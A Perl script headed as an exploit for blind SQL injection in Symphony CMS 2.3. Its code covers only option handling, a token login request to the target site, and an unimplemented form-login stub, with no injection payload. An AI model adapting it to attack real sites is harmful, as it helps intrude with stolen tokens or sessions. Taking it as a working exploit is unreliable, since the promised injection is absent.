#!/usr/bin/perl
# Exploit blind sql injection in username update function of symphony-cms 2.3
# Written by Wireghoul - http://www.justanotherhacker.com
use strict;
use warnings;
use LWP::UserAgent;
use Getopt::Long;
use Data::Dumper;
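# Command-line handling and authentication dispatch.
#
# Accepted options: --token, --session, or --username together with
# --password. The single positional argument is the base URL of the target
# installation. Only the token login path issues a request; the session
# branch below only prints a message.
my %options = ();

# GetOptions returns false on an unknown or malformed option; show the
# synopsis instead of continuing with a half-parsed command line.
GetOptions( \%options, 'token=s', 'session=s', 'username=s', 'password=s' )
    or usage();
my $target = $ARGV[0];

# An option counts as supplied only when it carries a non-empty value, so
# validation and dispatch below agree on what "given" means.
my %given;
for my $name (qw(token session username password)) {
    my $value = $options{$name};
    $given{$name} = ( defined $value && length $value ) ? 1 : 0;
}

usage()
    unless $given{token}
    || $given{session}
    || ( $given{username} && $given{password} );

# --username and --password are only meaningful as a pair. Without this
# check, "--session X --username Y" passed validation and then selected the
# form login branch with no password.
usage() if $given{username} != $given{password};
usage() unless $target;

my $lwp = LWP::UserAgent->new();

if ( $given{token} ) {
    token_auth( $options{'token'} );
}
elsif ( $given{username} ) {
    form_auth();
}
else {
    # NOTE: this echoes the session identifier to STDOUT; treat captured
    # terminal output as credential-bearing.
    print "Exploiting active session: $options{'session'}\n";
}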
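# Request the token login URL "$target/login/$token".
#
# Takes the auth token as its only argument and relies on the file-level
# $target (base URL) and $lwp (LWP::UserAgent instance). Returns nothing.
#
# NOTE: the token is part of the URL path and is also echoed to STDOUT, so it
# will appear in web-server and proxy access logs and in any captured
# terminal output. Logs covering /login/<token> requests should be handled
# as credential-bearing.
sub token_auth {
    my ($token) = @_;

    my $login_url = "$target/login/$token";
    print "Attempting authentication using token via $login_url\n";

    # LWP reports transport and HTTP errors on the response object rather
    # than dying, so an unchecked call fails silently. A successful status
    # only shows the request completed, not that the token was accepted.
    my $response = $lwp->get($login_url);
    warn 'Token login request failed: ', $response->status_line, "\n"
        unless $response->is_success;

    return;
}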
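# Placeholder for username/password login through the login form.
#
# The body was never written, so --username/--password do not authenticate
# anything. Warn instead of returning silently so the operator is not left
# assuming a session was established. Takes no arguments, returns nothing.
sub form_auth {
    warn "form_auth: username/password login is not implemented; "
        . "no authentication was attempted\n";
    return;
}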
# Print the command-line synopsis to STDOUT and terminate the script.
# Takes no arguments and never returns to the caller. The bare exit ends
# the process with status 0, so wrappers cannot tell a usage error from a
# normal run by exit code.
sub usage {
    my @option_help = (
        "\t--token\t\t- auth token for login\n",
        "\t--session\t- session id to use\n",
        "\t--username\t- username for login form\n",
        "\t--password\t- password to use with login form\n",
    );

    print "$0 <options> baseurl\n", "Options are:\n", @option_help;
    exit;
}